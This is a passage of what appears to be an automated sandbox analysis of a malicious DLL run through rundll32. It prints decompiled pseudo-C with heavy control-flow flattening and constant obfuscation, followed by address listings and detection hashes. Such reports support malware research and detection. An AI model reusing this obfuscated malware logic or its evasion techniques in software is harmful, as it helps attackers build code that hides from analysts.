				_v1676 = _v1676 ^ 0x68615bca;
				_v1736 = 0xced2;
				_v1736 = _v1736 / _t473;
				_t474 = 0x45;
				_v1736 = _v1736 / _t474;
				_v1736 = _v1736 ^ 0x00002bb2;
				_v1748 = 0xc83d;
				_v1748 = _v1748 | 0xac12259f;
				_v1748 = _v1748 + 0xffff4283;
				_v1748 = _v1748 ^ 0xac12199f;
				_v1696 = 0xff80;
				_t475 = 0x51;
				_v1696 = _v1696 / _t475;
				_v1696 = _v1696 ^ 0x0000122c;
				_v1700 = 0x5074;
				_v1700 = _v1700 + 0xffffb5cd;
				_v1700 = _v1700 ^ 0x0000626a;
				_v1668 = 0xce62;
				_t476 = 0x5d;
				_v1668 = _v1668 / _t476;
				_v1668 = _v1668 ^ 0x00006436;
				_v1652 = 0x16bc;
				_v1652 = _v1652 << 3;
				_v1652 = _v1652 ^ 0x0000d776;
				_v1664 = 0x5160;
				_v1664 = _v1664 + 0xffff7d7f;
				_v1664 = _v1664 ^ 0xfffff234;
				_v1776 = 0x2bb0;
				_v1776 = _v1776 ^ 0xda170107;
				_v1776 = _v1776 >> 9;
				_v1776 = _v1776 >> 0xa;
				_v1776 = _v1776 ^ 0x00006842;
				_v1660 = 0xed5a;
				_t477 = 0x4f;
				_v1660 = _v1660 / _t477;
				_v1660 = _v1660 ^ 0x00003872;
				_v1708 = 0x88f4;
				_v1708 = _v1708 + 0x1364;
				_v1708 = _v1708 ^ 0x00009651;
				_v1712 = 0x6359;
				_v1712 = _v1712 ^ 0x0adc469b;
				_t469 = _v1708;
				_v1712 = _v1712 * 0x12;
				_v1712 = _v1712 ^ 0xc37acb18;
				_v1672 = 0x7869;
				_v1672 = _v1672 * 0x31;
				_v1672 = _v1672 ^ 0x001774dc;
				_v1752 = 0x2ad2;
				_v1752 = _v1752 + 0x99c0;
				_v1752 = _v1752 + 0xffff4378;
				_v1752 = _v1752 ^ 0x00000634;
				while(1) {
					_t457 = 0x2e;
					L2:
					while(_t416 != 0x34b2b71) {
						if(_t416 == 0x5071dc9) {
							__eflags = _v1636 & _v1780;
							if(__eflags == 0) {
								_t403 = _a16( &_v1636, _a12);
								asm("sbb ecx, ecx");
								_t420 =  ~_t403 & 0x01e56524;
								L9:
								_t416 = _t420 + 0x36fd2c93;
								while(1) {
									_t457 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1592 - _t457;
							if(_v1592 != _t457) {
								L18:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(0x100015c0);
									_push(_v1744);
									_t410 = E1001BF25(_v1704, _v1772, __eflags);
									_pop(_t423);
									E100163BF(_t410, __eflags, _v1648, _v1732,  &_v524, _t423, _v1684, _t480,  &_v1592, _v1724);
									E10004EA1( &_v524, _v1764, _v1676, _v1736, _a12, _a16, _v1748, _a24);
									_t407 = E1001C5F7(_v1696, _v1700, _v1668, _v1652, _t410);
									_t482 =  &(_t482[0x11]);
									_t457 = 0x2e;
								}
								L17:
								_t416 = 0x38e291b7;
								continue;
							}
							__eflags = _v1590;
							if(__eflags == 0) {
								goto L17;
							}
							__eflags = _v1590 - _t457;
							if(_v1590 != _t457) {
								goto L18;
							}
							__eflags = _v1588;
							if(__eflags != 0) {
								goto L18;
							}
							goto L17;
						}
						if(_t416 == 0x14043b9b) {
							_push(0x100015b0);
							_push(_v1792);
							_t404 = E1001BF25(_v1784, _v1760, __eflags);
							_pop(_t429);
							E10013D3D(_t404, __eflags, _v1740, _v1800,  &_v1044, _v1720, _t429, _v1768);
							_t407 = E1001C5F7(_v1692, _v1788, _v1796, _v1656, _t404);
							_t482 =  &(_t482[9]);
							_t416 = 0x34b2b71;
							while(1) {
								_t457 = 0x2e;
								goto L2;
							}
						}
						if(_t416 == 0x363f5361) {
							_t416 = 0x14043b9b;
							continue;
						}
						if(_t416 == 0x36fd2c93) {
							return E10001EC9(_v1708, _v1712, _t469, _v1672, _v1752);
						}
						if(_t416 != 0x38e291b7) {
							L24:
							__eflags = _t416 - 0x1d1ded50;
							if(__eflags != 0) {
								continue;
							}
							return _t407;
						}
						_t407 = E1001D0A1(_v1664, _t469, _v1776, _v1660,  &_v1636);
						_t482 =  &(_t482[3]);
						asm("sbb ecx, ecx");
						_t420 =  ~_t407 & 0xce09f136;
						goto L9;
					}
					_t400 = E10002577( &_v1044,  &_v1636, _v1728, _v1756, _v1680, _v1688);
					_t469 = _t400;
					_t482 =  &(_t482[4]);
					__eflags = _t400 - 0xffffffff;
					if(__eflags == 0) {
						_t416 = 0x1d1ded50;
						_t457 = 0x2e;
						goto L24;
					}
					_t416 = 0x5071dc9;
				}
			}








































































                                                                        0x10004eaa
                                                                        0x10004eb1
                                                                        0x10004eb3
                                                                        0x10004eba
                                                                        0x10004ec1
                                                                        0x10004ec8
                                                                        0x10004ecf
                                                                        0x10004ed6
                                                                        0x10004ed7
                                                                        0x10004ed8
                                                                        0x10004edd
                                                                        0x10004ee5
                                                                        0x10004ee8
                                                                        0x10004ef5
                                                                        0x10004efd
                                                                        0x10004f02
                                                                        0x10004f0a
                                                                        0x10004f12
                                                                        0x10004f1a
                                                                        0x10004f22
                                                                        0x10004f2a
                                                                        0x10004f38
                                                                        0x10004f3d
                                                                        0x10004f43
                                                                        0x10004f4b
                                                                        0x10004f53
                                                                        0x10004f5b
                                                                        0x10004f63
                                                                        0x10004f6b
                                                                        0x10004f73
                                                                        0x10004f80
                                                                        0x10004f83
                                                                        0x10004f87
                                                                        0x10004f8f
                                                                        0x10004f97
                                                                        0x10004f9f
                                                                        0x10004fa7
                                                                        0x10004fac
                                                                        0x10004fb4
                                                                        0x10004fbc
                                                                        0x10004fca
                                                                        0x10004fcb
                                                                        0x10004fcf
                                                                        0x10004fd7
                                                                        0x10004fdf
                                                                        0x10004fe7
                                                                        0x10004fef
                                                                        0x10004ff4
                                                                        0x10004ffc
                                                                        0x10005004
                                                                        0x10005011
                                                                        0x10005015
                                                                        0x1000501d
                                                                        0x10005022
                                                                        0x1000502a
                                                                        0x10005032
                                                                        0x1000503a
                                                                        0x10005042
                                                                        0x1000504a
                                                                        0x10005052
                                                                        0x1000505f
                                                                        0x10005063
                                                                        0x1000506b
                                                                        0x10005073
                                                                        0x10005085
                                                                        0x10005089
                                                                        0x10005091
                                                                        0x10005099
                                                                        0x100050a4
                                                                        0x100050af
                                                                        0x100050ba
                                                                        0x100050c2
                                                                        0x100050ca
                                                                        0x100050cf
                                                                        0x100050d7
                                                                        0x100050df
                                                                        0x100050e7
                                                                        0x100050ef
                                                                        0x100050f4
                                                                        0x100050fc
                                                                        0x10005107
                                                                        0x1000510f
                                                                        0x1000511a
                                                                        0x10005122
                                                                        0x1000512a
                                                                        0x10005132
                                                                        0x1000513a
                                                                        0x1000513f
                                                                        0x10005147
                                                                        0x1000514f
                                                                        0x10005157
                                                                        0x1000515c
                                                                        0x10005161
                                                                        0x10005169
                                                                        0x10005171
                                                                        0x10005176
                                                                        0x1000517e
                                                                        0x10005186
                                                                        0x10005196
                                                                        0x100051a0
                                                                        0x100051a5
                                                                        0x100051ab
                                                                        0x100051b3
                                                                        0x100051be
                                                                        0x100051c9
                                                                        0x100051d4
                                                                        0x100051dc
                                                                        0x100051e9
                                                                        0x100051ec
                                                                        0x100051f0
                                                                        0x100051f8
                                                                        0x10005203
                                                                        0x1000520e
                                                                        0x10005219
                                                                        0x10005221
                                                                        0x10005229
                                                                        0x10005231
                                                                        0x10005239
                                                                        0x1000523e
                                                                        0x10005246
                                                                        0x1000524e
                                                                        0x10005256
                                                                        0x10005261
                                                                        0x1000526c
                                                                        0x10005277
                                                                        0x10005287
                                                                        0x1000528f
                                                                        0x10005292
                                                                        0x10005296
                                                                        0x100052a0
                                                                        0x100052a8
                                                                        0x100052b0
                                                                        0x100052b8
                                                                        0x100052c0
                                                                        0x100052ce
                                                                        0x100052d3
                                                                        0x100052d9
                                                                        0x100052e1
                                                                        0x100052e9
                                                                        0x100052f1
                                                                        0x100052f9
                                                                        0x1000530b
                                                                        0x10005310
                                                                        0x10005319
                                                                        0x10005324
                                                                        0x1000532f
                                                                        0x10005337
                                                                        0x10005342
                                                                        0x1000534d
                                                                        0x10005358
                                                                        0x10005363
                                                                        0x1000536b
                                                                        0x10005373
                                                                        0x10005378
                                                                        0x1000537d
                                                                        0x10005385
                                                                        0x10005397
                                                                        0x1000539a
                                                                        0x100053a1
                                                                        0x100053ac
                                                                        0x100053b4
                                                                        0x100053bc
                                                                        0x100053c4
                                                                        0x100053cc
                                                                        0x100053d9
                                                                        0x100053dd
                                                                        0x100053e1
                                                                        0x100053e9
                                                                        0x100053fc
                                                                        0x10005403
                                                                        0x1000540e
                                                                        0x10005416
                                                                        0x1000541e
                                                                        0x10005426
                                                                        0x1000542e
                                                                        0x10005430
                                                                        0x00000000
                                                                        0x10005431
                                                                        0x10005443
                                                                        0x10005519
                                                                        0x10005520
                                                                        0x10005624
                                                                        0x1000562f
                                                                        0x10005631
                                                                        0x100054a1
                                                                        0x100054a1
                                                                        0x1000542e
                                                                        0x10005430
                                                                        0x00000000
                                                                        0x10005430
                                                                        0x1000542e
                                                                        0x10005526
                                                                        0x1000552e
                                                                        0x1000555a
                                                                        0x1000555a
                                                                        0x10005562
                                                                        0x10005564
                                                                        0x10005569
                                                                        0x10005575
                                                                        0x1000557b
                                                                        0x100055af
                                                                        0x100055e3
                                                                        0x10005605
                                                                        0x1000560a
                                                                        0x1000560f
                                                                        0x1000560f
                                                                        0x10005550
                                                                        0x10005550
                                                                        0x00000000
                                                                        0x10005550
                                                                        0x10005530
                                                                        0x10005539
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000553b
                                                                        0x10005543
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10005545
                                                                        0x1000554e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000554e
                                                                        0x1000544f
                                                                        0x100054b0
                                                                        0x100054b5
                                                                        0x100054c1
                                                                        0x100054c7
                                                                        0x100054e7
                                                                        0x10005503
                                                                        0x10005508
                                                                        0x1000550b
                                                                        0x1000542e
                                                                        0x10005430
                                                                        0x00000000
                                                                        0x10005430
                                                                        0x1000542e
                                                                        0x10005457
                                                                        0x100054a9
                                                                        0x00000000
                                                                        0x100054a9
                                                                        0x1000545f
                                                                        0x00000000
                                                                        0x100056a5
                                                                        0x1000546b
                                                                        0x1000567e
                                                                        0x1000567e
                                                                        0x10005684
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10005684
                                                                        0x1000548d
                                                                        0x10005492
                                                                        0x10005499
                                                                        0x1000549b
                                                                        0x00000000
                                                                        0x1000549b
                                                                        0x1000565d
                                                                        0x10005662
                                                                        0x10005664
                                                                        0x10005667
                                                                        0x1000566a
                                                                        0x10005678
                                                                        0x1000567d
                                                                        0x00000000
                                                                        0x1000567d
                                                                        0x1000566c
                                                                        0x1000566c

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /T$6d$Bh$NO$Sex;$Yc$Z$[*$aS?6$aS?6$b$ix$jb$m$r8${'$0$I$M
                                                                        • API String ID: 0-4291825950
                                                                        • Opcode ID: 9b65fe41b74495a2a11ebe89abe6a38f0661331196ce63fca6bce6fffc707089
                                                                        • Instruction ID: 8667d57ab57f633c3b350f9276bfc3316d3d5256110005b5da9373a31fbac2ab
                                                                        • Opcode Fuzzy Hash: 9b65fe41b74495a2a11ebe89abe6a38f0661331196ce63fca6bce6fffc707089
                                                                        • Instruction Fuzzy Hash: 7712137150C7819FE364CF21C849A9FBBE2FBC4398F10891DE19A862A0D7B59949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001E19F, Relevance: 21.7, Strings: 17, Instructions: 470COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E1001E19F(void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				unsigned int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				void* __ecx;
				void* _t451;
				void* _t486;
				signed int _t488;
				intOrPtr _t496;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				void* _t535;
				intOrPtr _t573;
				void* _t575;
				signed int* _t587;
				void* _t590;

				_t516 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100056B2(_t451);
				_v16 = 0x624f91;
				_t587 =  &(( &_v220)[4]);
				_v12 = 0x2a04c0;
				_v8 = 0x512f64;
				_t573 = 0;
				_v4 = 0;
				_t575 = 0x21d5185e;
				_v216 = 0xc140;
				_t518 = 0xe;
				_v216 = _v216 / _t518;
				_v216 = _v216 | 0xdbfffb91;
				_v216 = _v216 ^ 0xdbff99d3;
				_v168 = 0x2a5e;
				_v168 = _v168 ^ 0xa3c44280;
				_v168 = _v168 << 9;
				_t519 = 0x26;
				_v168 = _v168 / _t519;
				_v168 = _v168 ^ 0x03993ad3;
				_v192 = 0x18c2;
				_v192 = _v192 ^ 0xd0e63b27;
				_v192 = _v192 ^ 0xef30ec67;
				_t36 =  &_v192; // 0xef30ec67
				_t520 = 0x16;
				_v192 =  *_t36 / _t520;
				_v192 = _v192 ^ 0x02e65ae3;
				_v28 = 0x8b75;
				_t521 = 0x66;
				_v28 = _v28 / _t521;
				_v28 = _v28 ^ 0x0000015f;
				_v116 = 0x1a67;
				_v116 = _v116 ^ 0x4b480ab8;
				_v116 = _v116 + 0xffffe6d8;
				_v116 = _v116 ^ 0x4b47f7f7;
				_v164 = 0xf9a1;
				_v164 = _v164 + 0xce44;
				_t522 = 0x15;
				_v164 = _v164 / _t522;
				_v164 = _v164 * 0x64;
				_v164 = _v164 ^ 0xf0087ab4;
				_v104 = 0x8783;
				_v104 = _v104 >> 9;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x000005ac;
				_v68 = 0xc586;
				_v68 = _v68 * 0x2a;
				_v68 = _v68 ^ 0x00202599;
				_v40 = 0xd110;
				_v40 = _v40 | 0x671d2d67;
				_v40 = _v40 ^ 0x671d8efb;
				_v100 = 0x326d;
				_v100 = _v100 ^ 0xf0f4e5fa;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0x3d35bfd9;
				_v48 = 0x7d57;
				_t523 = 0x63;
				_v48 = _v48 * 0x6e;
				_v48 = _v48 ^ 0x0035e190;
				_v156 = 0xbe8d;
				_v156 = _v156 | 0xda6f2624;
				_v156 = _v156 + 0xdae9;
				_v156 = _v156 | 0xe9accc97;
				_v156 = _v156 ^ 0xfbfc818b;
				_v108 = 0xbce1;
				_v108 = _v108 ^ 0x7ee51402;
				_v108 = _v108 + 0xffff7bea;
				_v108 = _v108 ^ 0x7ee5758f;
				_v56 = 0x8521;
				_v56 = _v56 ^ 0x357a7630;
				_v56 = _v56 ^ 0x357a8a2f;
				_v124 = 0x158;
				_v124 = _v124 + 0xffffb1a8;
				_v124 = _v124 | 0x92d6cfda;
				_v124 = _v124 ^ 0xffffc67a;
				_v172 = 0xab3b;
				_v172 = _v172 | 0xe0b1ec5b;
				_v172 = _v172 ^ 0xbad91e0a;
				_v172 = _v172 + 0xa707;
				_v172 = _v172 ^ 0x5a69f167;
				_v96 = 0xed9e;
				_v96 = _v96 + 0x6931;
				_v96 = _v96 ^ 0x00013b1d;
				_v208 = 0xc215;
				_v208 = _v208 + 0xb2e7;
				_v208 = _v208 ^ 0x39f9ff48;
				_v208 = _v208 + 0x9ab9;
				_v208 = _v208 ^ 0x39f93b82;
				_v112 = 0x3498;
				_v112 = _v112 + 0x4bc6;
				_v112 = _v112 / _t523;
				_v112 = _v112 ^ 0x00004366;
				_v220 = 0x48;
				_v220 = _v220 | 0xadbd3685;
				_t524 = 0x25;
				_v220 = _v220 / _t524;
				_v220 = _v220 + 0xbcbb;
				_v220 = _v220 ^ 0x04b294b8;
				_v160 = 0x4d28;
				_v160 = _v160 >> 3;
				_t525 = 0x58;
				_v160 = _v160 * 0xb;
				_v160 = _v160 / _t525;
				_v160 = _v160 ^ 0x00006f26;
				_v60 = 0xbd2;
				_v60 = _v60 + 0xffff7eef;
				_v60 = _v60 ^ 0xffffcc99;
				_v32 = 0x1812;
				_v32 = _v32 + 0xffff0573;
				_v32 = _v32 ^ 0xffff5502;
				_v132 = 0x7f72;
				_t526 = 0x75;
				_v132 = _v132 / _t526;
				_v132 = _v132 + 0xb09c;
				_v132 = _v132 ^ 0x000095d1;
				_v188 = 0x9149;
				_v188 = _v188 | 0xa4dde4e7;
				_v188 = _v188 + 0x1385;
				_v188 = _v188 << 0xe;
				_v188 = _v188 ^ 0x825d3d05;
				_v152 = 0x592e;
				_t527 = 0x28;
				_v152 = _v152 * 0x2c;
				_v152 = _v152 ^ 0x9c2a3110;
				_v152 = _v152 ^ 0x9c255458;
				_v196 = 0x1135;
				_v196 = _v196 + 0xfffff425;
				_v196 = _v196 >> 6;
				_v196 = _v196 ^ 0xbfbf1d5b;
				_v196 = _v196 ^ 0xbfbf60c8;
				_v204 = 0xcc36;
				_v204 = _v204 * 0xe;
				_v204 = _v204 >> 1;
				_v204 = _v204 << 0xa;
				_v204 = _v204 ^ 0x1655baac;
				_v212 = 0xe9d4;
				_v212 = _v212 + 0xffff7206;
				_v212 = _v212 + 0x7a90;
				_v212 = _v212 ^ 0x86b4db23;
				_v212 = _v212 ^ 0x86b43879;
				_v180 = 0xccf3;
				_v180 = _v180 ^ 0xb9c8351b;
				_v180 = _v180 | 0x98038e8f;
				_v180 = _v180 * 0x49;
				_v180 = _v180 ^ 0xfb2bf902;
				_v64 = 0x9efe;
				_v64 = _v64 + 0xfffffaef;
				_v64 = _v64 ^ 0x0000b4c9;
				_v72 = 0xd172;
				_v72 = _v72 | 0x8d5131d7;
				_v72 = _v72 ^ 0x8d51ace7;
				_v120 = 0x59d5;
				_v120 = _v120 + 0xffffff6e;
				_v120 = _v120 >> 6;
				_v120 = _v120 ^ 0x00005703;
				_v84 = 0xde85;
				_v84 = _v84 ^ 0x89f562d5;
				_v84 = _v84 ^ 0x89f58b7f;
				_v52 = 0x311b;
				_v52 = _v52 << 1;
				_v52 = _v52 ^ 0x00002d97;
				_v184 = 0xdffe;
				_v184 = _v184 ^ 0xc31def80;
				_v184 = _v184 << 1;
				_v184 = _v184 * 0xe;
				_v184 = _v184 ^ 0x573173b9;
				_v144 = 0x2421;
				_v144 = _v144 * 0x7e;
				_v144 = _v144 + 0xffffbdf8;
				_v144 = _v144 ^ 0x0011d9fd;
				_v140 = 0xb5be;
				_v140 = _v140 + 0xffff1138;
				_v140 = _v140 ^ 0xaa88dcf7;
				_v140 = _v140 ^ 0x55773d43;
				_v44 = 0x6427;
				_v44 = _v44 ^ 0x73b6b443;
				_v44 = _v44 ^ 0x73b6c2cf;
				_v76 = 0xab83;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x00003dd9;
				_v176 = 0xa297;
				_v176 = _v176 + 0x40d1;
				_v176 = _v176 / _t527;
				_v176 = _v176 >> 0xb;
				_v176 = _v176 ^ 0x0000189d;
				_v136 = 0x856e;
				_v136 = _v136 << 0xf;
				_v136 = _v136 >> 0x10;
				_v136 = _v136 ^ 0x00004166;
				_v200 = 0x9381;
				_v200 = _v200 << 5;
				_v200 = _v200 + 0xcf90;
				_t528 = 0x3c;
				_v200 = _v200 / _t528;
				_v200 = _v200 ^ 0x000016ff;
				_v80 = 0x8f73;
				_v80 = _v80 + 0xffffab60;
				_v80 = _v80 ^ 0x00004f6d;
				_v88 = 0xa0c7;
				_v88 = _v88 ^ 0xf6585f6c;
				_v88 = _v88 ^ 0xf658d2ca;
				_v148 = 0x53c;
				_v148 = _v148 << 9;
				_v148 = _v148 << 0x10;
				_v148 = _v148 ^ 0x7800710d;
				_v36 = 0x1d9;
				_v36 = _v36 + 0x3c9e;
				_v36 = _v36 ^ 0x00013e77;
				_v92 = 0x5eee;
				_v92 = _v92 + 0xffffe50b;
				_v92 = _v92 ^ 0x000043ea;
				_v128 = 0xff6;
				_v128 = _v128 >> 0xd;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x00000001;
				goto L1;
				do {
					while(1) {
						L1:
						_t590 = _t575 - 0x21d5185e;
						if(_t590 > 0) {
							break;
						}
						if(_t590 == 0) {
							_t535 = 0x2c;
							_t496 = E100157E8(_t535);
							 *0x100221b4 = _t496;
							_t528 = _t528;
							if(_t496 != 0) {
								_t575 = 0x235d3418;
								continue;
							}
						} else {
							if(_t575 == 0x1d010d0) {
								_t528 = _v44;
								_t501 = E10008F73(_t528, _v76,  *((intOrPtr*)( *0x100221b4 + 4)), _t528, _v176, _v136, _t528, _v200, _v168,  *0x100221b4 + 0x10);
								_t587 =  &(_t587[8]);
								if(_t501 != 0) {
									_t573 = 1;
								} else {
									_t575 = 0x2ad17601;
									continue;
								}
							} else {
								if(_t575 == 0x2a7485f) {
									_push(_t528);
									E10008A8C( *((intOrPtr*)( *0x100221b4 + 4)));
									_t528 = _t528;
									_t575 = 0xea2ab84;
									continue;
								} else {
									if(_t575 == 0x6da30e1) {
										_push(_t528);
										E1000AC80( *((intOrPtr*)( *0x100221b4 + 0x14)));
										_t528 = _t528;
										_t575 = 0x2a7485f;
										continue;
									} else {
										if(_t575 == 0xea2ab84) {
											E100091CD(_v40, _v100, _v48,  *0x100221b4, _v156);
										} else {
											if(_t575 != 0x16122494) {
												goto L25;
											} else {
												_push(_t528);
												_t528 = _v184;
												_t511 = E1000AB96(_t528, _v144, _v216, _v140, _v28,  *((intOrPtr*)( *0x100221b4 + 4)));
												_t587 =  &(_t587[5]);
												asm("sbb esi, esi");
												_t575 = ( ~_t511 & 0xfaf5dfef) + 0x6da30e1;
												continue;
											}
										}
									}
								}
							}
						}
						L29:
						return _t573;
					}
					if(_t575 == 0x235d3418) {
						_push(_t528);
						_t528 = _v164 | _v116;
						_t486 = E10003BCD(_t528, _v108, _v56, _v124, _t528, _v172, _t528,  *0x100221b4 + 4);
						_t587 =  &(_t587[7]);
						if(_t486 == 0) {
							_t575 = 0xea2ab84;
							goto L25;
						} else {
							_t575 = 0x2b13f55e;
							goto L1;
						}
					} else {
						if(_t575 == 0x261556b7) {
							_t488 = E10007A59(_v132, _v188, _v24,  *0x100221b4, _v20,  *((intOrPtr*)( *0x100221b4 + 4)),  *0x100221b4 + 0x14, _v152, _v196, _t528, _v204, _v212);
							_t528 = _v180;
							asm("sbb esi, esi");
							_t575 = ( ~_t488 & 0x136adc35) + 0x2a7485f;
							E10007BE0(_t528, _v24, _v64, _v72);
							_t587 =  &(_t587[0xc]);
							goto L25;
						} else {
							if(_t575 == 0x2ad17601) {
								_push(_t528);
								E1000AC80( *((intOrPtr*)( *0x100221b4)));
								_t528 = _t528;
								_t575 = 0x6da30e1;
								goto L1;
							} else {
								if(_t575 != 0x2b13f55e) {
									goto L25;
								} else {
									_push(_t528);
									_t528 =  &_v20;
									_t515 = E1000CC2A(_t528, _v92,  *_t516, _v112, _v220, _v160, _v128 | _v36,  &_v24, _v60,  *((intOrPtr*)(_t516 + 4)), _v32, _v192);
									_t587 =  &(_t587[0xb]);
									asm("sbb esi, esi");
									_t575 = ( ~_t515 & 0x236e0e58) + 0x2a7485f;
									goto L1;
								}
							}
						}
					}
					goto L29;
					L25:
				} while (_t575 != 0x1e355eb8);
				goto L29;
			}


















































































                                                                        0x1001e1a6
                                                                        0x1001e1b0
                                                                        0x1001e1b1
                                                                        0x1001e1b8
                                                                        0x1001e1ba
                                                                        0x1001e1bf
                                                                        0x1001e1ca
                                                                        0x1001e1cd
                                                                        0x1001e1da
                                                                        0x1001e1e5
                                                                        0x1001e1e7
                                                                        0x1001e1ee
                                                                        0x1001e1f3
                                                                        0x1001e201
                                                                        0x1001e206
                                                                        0x1001e20c
                                                                        0x1001e214
                                                                        0x1001e21c
                                                                        0x1001e224
                                                                        0x1001e22c
                                                                        0x1001e235
                                                                        0x1001e23a
                                                                        0x1001e240
                                                                        0x1001e248
                                                                        0x1001e250
                                                                        0x1001e258
                                                                        0x1001e260
                                                                        0x1001e264
                                                                        0x1001e269
                                                                        0x1001e26f
                                                                        0x1001e277
                                                                        0x1001e289
                                                                        0x1001e28e
                                                                        0x1001e297
                                                                        0x1001e2a2
                                                                        0x1001e2aa
                                                                        0x1001e2b2
                                                                        0x1001e2ba
                                                                        0x1001e2c2
                                                                        0x1001e2ca
                                                                        0x1001e2d6
                                                                        0x1001e2d9
                                                                        0x1001e2e2
                                                                        0x1001e2e6
                                                                        0x1001e2ee
                                                                        0x1001e2f9
                                                                        0x1001e301
                                                                        0x1001e309
                                                                        0x1001e314
                                                                        0x1001e327
                                                                        0x1001e32e
                                                                        0x1001e339
                                                                        0x1001e344
                                                                        0x1001e34f
                                                                        0x1001e35a
                                                                        0x1001e365
                                                                        0x1001e372
                                                                        0x1001e37a
                                                                        0x1001e385
                                                                        0x1001e39a
                                                                        0x1001e39d
                                                                        0x1001e3a4
                                                                        0x1001e3af
                                                                        0x1001e3b7
                                                                        0x1001e3bf
                                                                        0x1001e3c7
                                                                        0x1001e3cf
                                                                        0x1001e3d7
                                                                        0x1001e3e2
                                                                        0x1001e3ed
                                                                        0x1001e3f8
                                                                        0x1001e403
                                                                        0x1001e40e
                                                                        0x1001e419
                                                                        0x1001e424
                                                                        0x1001e42c
                                                                        0x1001e434
                                                                        0x1001e43c
                                                                        0x1001e444
                                                                        0x1001e44c
                                                                        0x1001e454
                                                                        0x1001e45c
                                                                        0x1001e464
                                                                        0x1001e46c
                                                                        0x1001e477
                                                                        0x1001e482
                                                                        0x1001e48d
                                                                        0x1001e495
                                                                        0x1001e49d
                                                                        0x1001e4a5
                                                                        0x1001e4ad
                                                                        0x1001e4b5
                                                                        0x1001e4c0
                                                                        0x1001e4d6
                                                                        0x1001e4dd
                                                                        0x1001e4e8
                                                                        0x1001e4f0
                                                                        0x1001e4fc
                                                                        0x1001e501
                                                                        0x1001e507
                                                                        0x1001e50f
                                                                        0x1001e517
                                                                        0x1001e51f
                                                                        0x1001e529
                                                                        0x1001e52c
                                                                        0x1001e538
                                                                        0x1001e53c
                                                                        0x1001e544
                                                                        0x1001e54f
                                                                        0x1001e55a
                                                                        0x1001e565
                                                                        0x1001e570
                                                                        0x1001e57b
                                                                        0x1001e586
                                                                        0x1001e592
                                                                        0x1001e595
                                                                        0x1001e599
                                                                        0x1001e5a1
                                                                        0x1001e5a9
                                                                        0x1001e5b3
                                                                        0x1001e5bb
                                                                        0x1001e5c3
                                                                        0x1001e5c8
                                                                        0x1001e5d0
                                                                        0x1001e5df
                                                                        0x1001e5e0
                                                                        0x1001e5e4
                                                                        0x1001e5ec
                                                                        0x1001e5f4
                                                                        0x1001e5fc
                                                                        0x1001e604
                                                                        0x1001e609
                                                                        0x1001e611
                                                                        0x1001e619
                                                                        0x1001e626
                                                                        0x1001e62a
                                                                        0x1001e62e
                                                                        0x1001e633
                                                                        0x1001e63b
                                                                        0x1001e643
                                                                        0x1001e64b
                                                                        0x1001e653
                                                                        0x1001e65b
                                                                        0x1001e663
                                                                        0x1001e66b
                                                                        0x1001e673
                                                                        0x1001e680
                                                                        0x1001e684
                                                                        0x1001e68c
                                                                        0x1001e697
                                                                        0x1001e6a2
                                                                        0x1001e6ad
                                                                        0x1001e6b8
                                                                        0x1001e6c3
                                                                        0x1001e6ce
                                                                        0x1001e6d6
                                                                        0x1001e6de
                                                                        0x1001e6e3
                                                                        0x1001e6eb
                                                                        0x1001e6f6
                                                                        0x1001e701
                                                                        0x1001e70c
                                                                        0x1001e717
                                                                        0x1001e71e
                                                                        0x1001e729
                                                                        0x1001e731
                                                                        0x1001e739
                                                                        0x1001e742
                                                                        0x1001e746
                                                                        0x1001e74e
                                                                        0x1001e75b
                                                                        0x1001e75f
                                                                        0x1001e767
                                                                        0x1001e76f
                                                                        0x1001e777
                                                                        0x1001e77f
                                                                        0x1001e787
                                                                        0x1001e78f
                                                                        0x1001e79a
                                                                        0x1001e7a5
                                                                        0x1001e7b0
                                                                        0x1001e7bb
                                                                        0x1001e7c3
                                                                        0x1001e7ce
                                                                        0x1001e7d6
                                                                        0x1001e7e4
                                                                        0x1001e7e8
                                                                        0x1001e7ed
                                                                        0x1001e7f5
